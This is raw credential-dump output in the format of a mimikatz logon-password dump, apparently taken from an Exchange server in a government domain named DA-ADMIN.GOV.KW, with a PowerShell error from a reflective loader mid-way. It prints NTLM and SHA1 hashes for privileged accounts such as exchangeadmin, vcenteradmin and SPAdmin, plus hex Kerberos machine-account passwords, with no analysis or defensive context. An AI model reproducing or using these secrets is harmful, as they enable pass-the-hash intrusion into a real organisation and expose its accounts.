	 * Password : e2 35 2c f6 b1 e9 54 5b 5c 59 6e ed ed c0 6a cd ff 7f f3 9a 82 e4 ac e2 19 cc d0 01 24 21 46 77 35 46 af 4d bf 78 e7 0b 11 32 92 6e b6 c5 41 d8 38 0b 12 a0 96 94 7c e0 18 7f 19 79 d8 15 56 c0 46 90 8c 9e 99 4f d5 4f 4a 2f f4 e3 5c 29 bb 8f 48 4f 80 c7 08 a4 5d 00 2b e8 65 52 61 9c bd a9 74 a3 e3 22 fb 58 18 e6 1f 45 09 32 c6 4d 49 3b 30 5f 5c 6d f5 0a a9 79 c9 18 a8 10 bf 3e df fa 7f 0f c1 bf dc a8 14 a1 7f 5f 25 28 52 13 2a 4e f3 1e 39 08 d9 5a 89 af 41 a0 41 20 cc 5e 0b 67 f8 04 44 db 1f 65 c7 a1 7d df db 6f 02 79 2a f4 8e f8 8e ac ec c8 bf cd 35 23 1f 52 7d 14 94 f3 dc d1 02 d6 6f 60 96 30 9d 25 78 69 16 83 c6 84 88 46 12 de a9 4c f2 d4 ae 4b 0a ec f0 b9 c7 32 21 93 fc 2d a2 1d 24 fb fd a0 de e6 16 6a 33 a4 
	ssp :	
	credman :	

Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : SYM-WIN2K2R2$
Domain            : DA-ADMIN
Logon Server      : (null)
Logon Time        : 11/25/2017 10:47:35 AM
SID               : S-1-5-18
	msv :	
	tspkg :	
	wdigest :	
	 * Username : SYM-WIN2K2R2$
	 * Domain   : DA-ADMIN
	 * Password : (null)
	kerberos :	
	 * Username : sym-win2k2r2$
	 * Domain   : DA-ADMIN.GOV.KW
	 * Password : (null)
	ssp :	
	credman :	
Update-ExeFunctions : Cannot bind argument to parameter 'ExeArguments' because 
it is an empty string.
At line:2359 char:140
+ ...  -ExeArguments $ExeArgs -ExeDoneBytePtr $ExeDoneBytePtr
+                    ~~~~~~~~
    + CategoryInfo          : InvalidData: (:) [Update-ExeFunctions], Paramete 
   rBindingValidationException
    + FullyQualifiedErrorId : ParameterArgumentValidationErrorEmptyStringNotAl 
   lowed,Update-ExeFunctions
 
20
Authentication Id : 0 ; 1117993580 (00000000:42a33a6c)
Session           : RemoteInteractive from 2
User Name         : exchangeadmin
Domain            : DA-ADMIN
Logon Server      : DC
Logon Time        : 1/2/2018 10:07:37 AM
SID               : S-1-5-21-2515415950-3022153381-902338616-2649
	msv :	
	 [00000003] Primary
	 * Username : exchangeadmin
	 * Domain   : DA-ADMIN
	 * NTLM     : 638c046c1f1a93a7a1b2292cf452b3b3
	 * SHA1     : a5f48f2bc55b33b8a5a0763711b91027ffb2efd7
	 [00010000] CredentialKeys
	 * NTLM     : 638c046c1f1a93a7a1b2292cf452b3b3
	 * SHA1     : a5f48f2bc55b33b8a5a0763711b91027ffb2efd7
	tspkg :	
	wdigest :	
	 * Username : exchangeadmin
	 * Domain   : DA-ADMIN
	 * Password : (null)
	kerberos :	
	 * Username : exchangeadmin
	 * Domain   : DA-ADMIN.GOV.KW
	 * Password : (null)
	ssp :	KO
	credman :	

Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : EXCH01$
Domain            : DA-ADMIN
Logon Server      : (null)
Logon Time        : 12/16/2017 5:57:46 PM
SID               : S-1-5-20
	msv :	
	 [00000003] Primary
	 * Username : EXCH01$
	 * Domain   : DA-ADMIN
	 * NTLM     : 6ae6691414bbcc75f1c042cd93bc2c2a
	 * SHA1     : fc890119664ba7763de8ae458dcb1cbf7ae4a26d
	tspkg :	
	wdigest :	
	 * Username : EXCH01$
	 * Domain   : DA-ADMIN
	 * Password : (null)
	kerberos :	
	 * Username : exch01$
	 * Domain   : DA-ADMIN.GOV.KW
	 * Password : (null)
	ssp :	KO
	credman :	

Authentication Id : 0 ; 2032683813 (00000000:79284b25)
Session           : Interactive from 3
User Name         : DWM-3
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 1/14/2018 7:53:54 PM
SID               : S-1-5-90-3
	msv :	
	 [00000003] Primary
	 * Username : EXCH01$
	 * Domain   : DA-ADMIN
	 * NTLM     : 6ae6691414bbcc75f1c042cd93bc2c2a
	 * SHA1     : fc890119664ba7763de8ae458dcb1cbf7ae4a26d
	tspkg :	
	wdigest :	
	 * Username : EXCH01$
	 * Domain   : DA-ADMIN
	 * Password : (null)
	kerberos :	
	 * Username : EXCH01$
	 * Domain   : da-admin.gov.kw
	 * Password : 2d 29 4a 8e d8 b6 15 2e 02 71 f5 35 f3 94 c5 fb 51 69 ab f4 37 ea c3 e5 e3 a1 80 1a 3c b9 76 e6 2b cb 0b aa 69 46 02 8f cf f0 ef d9 05 dc fd 21 f8 a7 1f 52 3a 51 db b9 5c 6f a3 2a f5 ba 48 f4 85 84 7f 4d 82 27 9d 99 97 64 d5 c2 3a c8 6d 39 11 d4 97 c7 e7 7d 45 d7 f1 ba f5 f6 b0 77 6e bd 49 0a 3c 8f 5e 92 c3 9d a8 d7 1e cc cc cb c8 c3 40 50 af 6f 12 56 46 31 85 71 95 bf 96 63 2c 99 ad 9a d5 89 79 72 a6 71 fa 74 e2 a5 f5 b9 13 5c 69 85 ee 3c c7 d0 fa 45 6f c6 e1 ca 54 97 24 a4 31 c6 02 3c 93 5c 39 9f fd ed 90 34 8f d6 83 7f 1d 8f 32 11 b8 eb f7 31 c7 7f b6 43 a8 a9 ae a5 3f 07 81 a3 d7 83 b4 ac e3 cc 51 9b 03 c8 cb 6c 81 34 56 d9 27 e3 58 7a 5e 11 5e c9 ed 93 33 89 11 6b 16 af 8f e9 53 b3 99 a2 43 d0 38 79 d7 86 
	ssp :	KO
	credman :	

Authentication Id : 0 ; 1192625 (00000000:001232b1)
Session           : NetworkCleartext from 0
User Name         : CLIUSR
Domain            : EXCH01
Logon Server      : EXCH01
Logon Time        : 12/16/2017 6:02:53 PM
SID               : S-1-5-21-417109617-2636227539-16914635-1010
	msv :	
	 [00010000] CredentialKeys
	 * NTLM     : 1c8c97a77e16db3a3e0b7d80e2a15be7
	 * SHA1     : 52b096b54da0954f1481eb3d412f9becdd082c6f
	 [00000003] Primary
	 * Username : CLIUSR
	 * Domain   : EXCH01
	 * NTLM     : 7ac069c83789e86f993fb512eea0b5ad
	 * SHA1     : 431475203a4a27f2aa247c21e06cf6b689c08c57
	tspkg :	
	wdigest :	
	 * Username : CLIUSR
	 * Domain   : EXCH01
	 * Password : (null)
	kerberos :	
	 * Username : CLIUSR
	 * Domain   : EXCH01
	 * Password : (null)
	ssp :	KO
	credman :	

Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 12/16/2017 5:57:47 PM
SID               : S-1-5-19
	msv :	
	tspkg :	
	wdigest :	
	 * Username : (null)
	 * Domain   : (null)
	 * Password : (null)
	kerberos :	
	 * Username : (null)
	 * Domain   : (null)
	 * Password : (null)
	ssp :	KO
	credman :	

Authentication Id : 0 ; 2032709566 (00000000:7928afbe)
Session           : RemoteInteractive from 3
User Name         : vcenteradmin
Domain            : DA-ADMIN
Logon Server      : DA-ADC
Logon Time        : 1/14/2018 7:53:55 PM
SID               : S-1-5-21-2515415950-3022153381-902338616-1110
	msv :	
	 [00000003] Primary
	 * Username : vcenteradmin
	 * Domain   : DA-ADMIN
	 * NTLM     : 3d43967cb7c24c905627c4240470dd90
	 * SHA1     : b3e1a265674f2a50fdd075aa211198a48754e847
	 [00010000] CredentialKeys
	 * NTLM     : 3d43967cb7c24c905627c4240470dd90
	 * SHA1     : b3e1a265674f2a50fdd075aa211198a48754e847
	tspkg :	
	wdigest :	
	 * Username : vcenteradmin
	 * Domain   : DA-ADMIN
	 * Password : (null)
	kerberos :	
	 * Username : vcenteradmin
	 * Domain   : DA-ADMIN.GOV.KW
	 * Password : (null)
	ssp :	KO
	credman :	

Authentication Id : 0 ; 1117986790 (00000000:42a31fe6)
Session           : Interactive from 2
User Name         : DWM-2
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 1/2/2018 10:07:36 AM
SID               : S-1-5-90-2
	msv :	
	 [00000003] Primary
	 * Username : EXCH01$
	 * Domain   : DA-ADMIN
	 * NTLM     : 6ae6691414bbcc75f1c042cd93bc2c2a
	 * SHA1     : fc890119664ba7763de8ae458dcb1cbf7ae4a26d
	tspkg :	
	wdigest :	
	 * Username : EXCH01$
	 * Domain   : DA-ADMIN
	 * Password : (null)
	kerberos :	
	 * Username : EXCH01$
	 * Domain   : da-admin.gov.kw
	 * Password : 2d 29 4a 8e d8 b6 15 2e 02 71 f5 35 f3 94 c5 fb 51 69 ab f4 37 ea c3 e5 e3 a1 80 1a 3c b9 76 e6 2b cb 0b aa 69 46 02 8f cf f0 ef d9 05 dc fd 21 f8 a7 1f 52 3a 51 db b9 5c 6f a3 2a f5 ba 48 f4 85 84 7f 4d 82 27 9d 99 97 64 d5 c2 3a c8 6d 39 11 d4 97 c7 e7 7d 45 d7 f1 ba f5 f6 b0 77 6e bd 49 0a 3c 8f 5e 92 c3 9d a8 d7 1e cc cc cb c8 c3 40 50 af 6f 12 56 46 31 85 71 95 bf 96 63 2c 99 ad 9a d5 89 79 72 a6 71 fa 74 e2 a5 f5 b9 13 5c 69 85 ee 3c c7 d0 fa 45 6f c6 e1 ca 54 97 24 a4 31 c6 02 3c 93 5c 39 9f fd ed 90 34 8f d6 83 7f 1d 8f 32 11 b8 eb f7 31 c7 7f b6 43 a8 a9 ae a5 3f 07 81 a3 d7 83 b4 ac e3 cc 51 9b 03 c8 cb 6c 81 34 56 d9 27 e3 58 7a 5e 11 5e c9 ed 93 33 89 11 6b 16 af 8f e9 53 b3 99 a2 43 d0 38 79 d7 86 
	ssp :	KO
	credman :	

Authentication Id : 0 ; 2026870639 (00000000:78cf976f)
Session           : NetworkCleartext from 0
User Name         : DAG01$
Domain            : DA-ADMIN
Logon Server      : DA-ADC
Logon Time        : 1/14/2018 6:00:33 PM
SID               : S-1-5-21-2515415950-3022153381-902338616-2701
	msv :	
	 [00000003] Primary
	 * Username : DAG01$
	 * Domain   : DA-ADMIN
	 * NTLM     : 6a30c5fbd74afcc39ffd49facf66be22
	 * SHA1     : 47c3481f8344af05ddd274c655cee3028f44b262
	tspkg :	
	wdigest :	
	 * Username : DAG01$
	 * Domain   : DA-ADMIN
	 * Password : (null)
	kerberos :	
	 * Username : DAG01$
	 * Domain   : DA-ADMIN.GOV.KW
	 * Password : (null)
	ssp :	KO
	credman :	

Authentication Id : 0 ; 1738834751 (00000000:67a4833f)
Session           : Service from 0
User Name         : DefaultAppPool
Domain            : IIS APPPOOL
Logon Server      : (null)
Logon Time        : 1/10/2018 8:09:21 PM
SID               : S-1-5-82-3006700770-424185619-1745488364-794895919-4004696415
	msv :	
	 [00000003] Primary
	 * Username : EXCH01$
	 * Domain   : DA-ADMIN
	 * NTLM     : 6ae6691414bbcc75f1c042cd93bc2c2a
	 * SHA1     : fc890119664ba7763de8ae458dcb1cbf7ae4a26d
	tspkg :	
	wdigest :	
	 * Username : EXCH01$
	 * Domain   : DA-ADMIN
	 * Password : (null)
	kerberos :	
	 * Username : EXCH01$
	 * Domain   : da-admin.gov.kw
	 * Password : 2d 29 4a 8e d8 b6 15 2e 02 71 f5 35 f3 94 c5 fb 51 69 ab f4 37 ea c3 e5 e3 a1 80 1a 3c b9 76 e6 2b cb 0b aa 69 46 02 8f cf f0 ef d9 05 dc fd 21 f8 a7 1f 52 3a 51 db b9 5c 6f a3 2a f5 ba 48 f4 85 84 7f 4d 82 27 9d 99 97 64 d5 c2 3a c8 6d 39 11 d4 97 c7 e7 7d 45 d7 f1 ba f5 f6 b0 77 6e bd 49 0a 3c 8f 5e 92 c3 9d a8 d7 1e cc cc cb c8 c3 40 50 af 6f 12 56 46 31 85 71 95 bf 96 63 2c 99 ad 9a d5 89 79 72 a6 71 fa 74 e2 a5 f5 b9 13 5c 69 85 ee 3c c7 d0 fa 45 6f c6 e1 ca 54 97 24 a4 31 c6 02 3c 93 5c 39 9f fd ed 90 34 8f d6 83 7f 1d 8f 32 11 b8 eb f7 31 c7 7f b6 43 a8 a9 ae a5 3f 07 81 a3 d7 83 b4 ac e3 cc 51 9b 03 c8 cb 6c 81 34 56 d9 27 e3 58 7a 5e 11 5e c9 ed 93 33 89 11 6b 16 af 8f e9 53 b3 99 a2 43 d0 38 79 d7 86 
	ssp :	KO
	credman :	

Authentication Id : 0 ; 15991087 (00000000:00f4012f)
Session           : Batch from 0
User Name         : SPAdmin
Domain            : DA-ADMIN
Logon Server      : DA-ADC
Logon Time        : 12/16/2017 11:00:15 PM
SID               : S-1-5-21-2515415950-3022153381-902338616-3045
	msv :	
	 [00000003] Primary
	 * Username : SPAdmin
	 * Domain   : DA-ADMIN
	 * NTLM     : ba0074ba8e051062ec7f58355dd90ea9
	 * SHA1     : e518f2d039eaabe8387d16f349c3d13f0c92b57f
	 [00010000] CredentialKeys
	 * NTLM     : ba0074ba8e051062ec7f58355dd90ea9
	 * SHA1     : e518f2d039eaabe8387d16f349c3d13f0c92b57f
	tspkg :	
	wdigest :	
	 * Username : SPAdmin
	 * Domain   : DA-ADMIN
	 * Password : (null)
	kerberos :	
	 * Username : SPAdmin
	 * Domain   : DA-ADMIN.GOV.KW
	 * Password : (null)
	ssp :	KO
	credman :	

Authentication Id : 0 ; 15953959 (00000000:00f37027)
Session           : Batch from 0
User Name         : SPAdmin
Domain            : DA-ADMIN
Logon Server      : DA-ADC
Logon Time        : 12/16/2017 11:00:02 PM
SID               : S-1-5-21-2515415950-3022153381-902338616-3045
	msv :	
	 [00000003] Primary
	 * Username : SPAdmin
	 * Domain   : DA-ADMIN
	 * NTLM     : ba0074ba8e051062ec7f58355dd90ea9
	 * SHA1     : e518f2d039eaabe8387d16f349c3d13f0c92b57f
	 [00010000] CredentialKeys
	 * NTLM     : ba0074ba8e051062ec7f58355dd90ea9
	 * SHA1     : e518f2d039eaabe8387d16f349c3d13f0c92b57f
	tspkg :	
	wdigest :	
	 * Username : SPAdmin
	 * Domain   : DA-ADMIN
	 * Password : (null)
	kerberos :	
	 * Username : SPAdmin
	 * Domain   : DA-ADMIN.GOV.KW
	 * Password : (null)
	ssp :	KO
	credman :	

Authentication Id : 0 ; 1458503 (00000000:00164147)
Session           : NetworkCleartext from 0
User Name         : DAG01$
Domain            : DA-ADMIN
Logon Server      : DA-ADC
Logon Time        : 12/16/2017 6:03:30 PM
SID               : S-1-5-21-2515415950-3022153381-902338616-2701
	msv :	
	 [00000003] Primary
	 * Username : DAG01$
	 * Domain   : DA-ADMIN
	 * NTLM     : 6a30c5fbd74afcc39ffd49facf66be22
	 * SHA1     : 47c3481f8344af05ddd274c655cee3028f44b262
	tspkg :	
	wdigest :	
	 * Username : DAG01$
	 * Domain   : DA-ADMIN
	 * Password : (null)
	kerberos :	
	 * Username : DAG01$
	 * Domain   : DA-ADMIN.GOV.KW
	 * Password : (null)
	ssp :	KO
	credman :	

Authentication Id : 0 ; 995 (00000000:000003e3)
Session           : Service from 0
User Name         : IUSR
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 12/16/2017 5:58:01 PM
SID               : S-1-5-17
	msv :	
	tspkg :	
	wdigest :	
	 * Username : (null)
	 * Domain   : (null)
	 * Password : (null)
	kerberos :	
	ssp :	KO
	credman :	

Authentication Id : 0 ; 68019 (00000000:000109b3)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 12/16/2017 5:57:47 PM
SID               : S-1-5-90-1
	msv :	
	 [00000003] Primary
	 * Username : EXCH01$
	 * Domain   : DA-ADMIN
	 * NTLM     : 6ae6691414bbcc75f1c042cd93bc2c2a
	 * SHA1     : fc890119664ba7763de8ae458dcb1cbf7ae4a26d
	tspkg :	
	wdigest :	
	 * Username : EXCH01$
	 * Domain   : DA-ADMIN
	 * Password : (null)
	kerberos :	
	 * Username : EXCH01$
	 * Domain   : da-admin.gov.kw
	 * Password : 2d 29 4a 8e d8 b6 15 2e 02 71 f5 35 f3 94 c5 fb 51 69 ab f4 37 ea c3 e5 e3 a1 80 1a 3c b9 76 e6 2b cb 0b aa 69 46 02 8f cf f0 ef d9 05 dc fd 21 f8 a7 1f 52 3a 51 db b9 5c 6f a3 2a f5 ba 48 f4 85 84 7f 4d 82 27 9d 99 97 64 d5 c2 3a c8 6d 39 11 d4 97 c7 e7 7d 45 d7 f1 ba f5 f6 b0 77 6e bd 49 0a 3c 8f 5e 92 c3 9d a8 d7 1e cc cc cb c8 c3 40 50 af 6f 12 56 46 31 85 71 95 bf 96 63 2c 99 ad 9a d5 89 79 72 a6 71 fa 74 e2 a5 f5 b9 13 5c 69 85 ee 3c c7 d0 fa 45 6f c6 e1 ca 54 97 24 a4 31 c6 02 3c 93 5c 39 9f fd ed 90 34 8f d6 83 7f 1d 8f 32 11 b8 eb f7 31 c7 7f b6 43 a8 a9 ae a5 3f 07 81 a3 d7 83 b4 ac e3 cc 51 9b 03 c8 cb 6c 81 34 56 d9 27 e3 58 7a 5e 11 5e c9 ed 93 33 89 11 6b 16 af 8f e9 53 b3 99 a2 43 d0 38 79 d7 86 
	ssp :	KO
	credman :	

Authentication Id : 0 ; 42311 (00000000:0000a547)
Session           : UndefinedLogonType from 0
User Name         : (null)
Domain            : (null)
Logon Server      : (null)
Logon Time        : 12/16/2017 5:57:46 PM
SID               : 
	msv :	
	 [00000003] Primary
	 * Username : EXCH01$
	 * Domain   : DA-ADMIN
	 * NTLM     : 6ae6691414bbcc75f1c042cd93bc2c2a
	 * SHA1     : fc890119664ba7763de8ae458dcb1cbf7ae4a26d
	tspkg :	
	wdigest :	
	kerberos :	
	ssp :	KO
	credman :	

Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : EXCH01$
Domain            : DA-ADMIN
Logon Server      : (null)
Logon Time        : 12/16/2017 5:57:46 PM
SID               : S-1-5-18
	msv :	
	tspkg :	
	wdigest :	
	 * Username : EXCH01$
	 * Domain   : DA-ADMIN
	 * Password : (null)
	kerberos :	
	 * Username : exch01$
	 * Domain   : DA-ADMIN.GOV.KW
	 * Password : (null)
	ssp :	KO
	credman :	

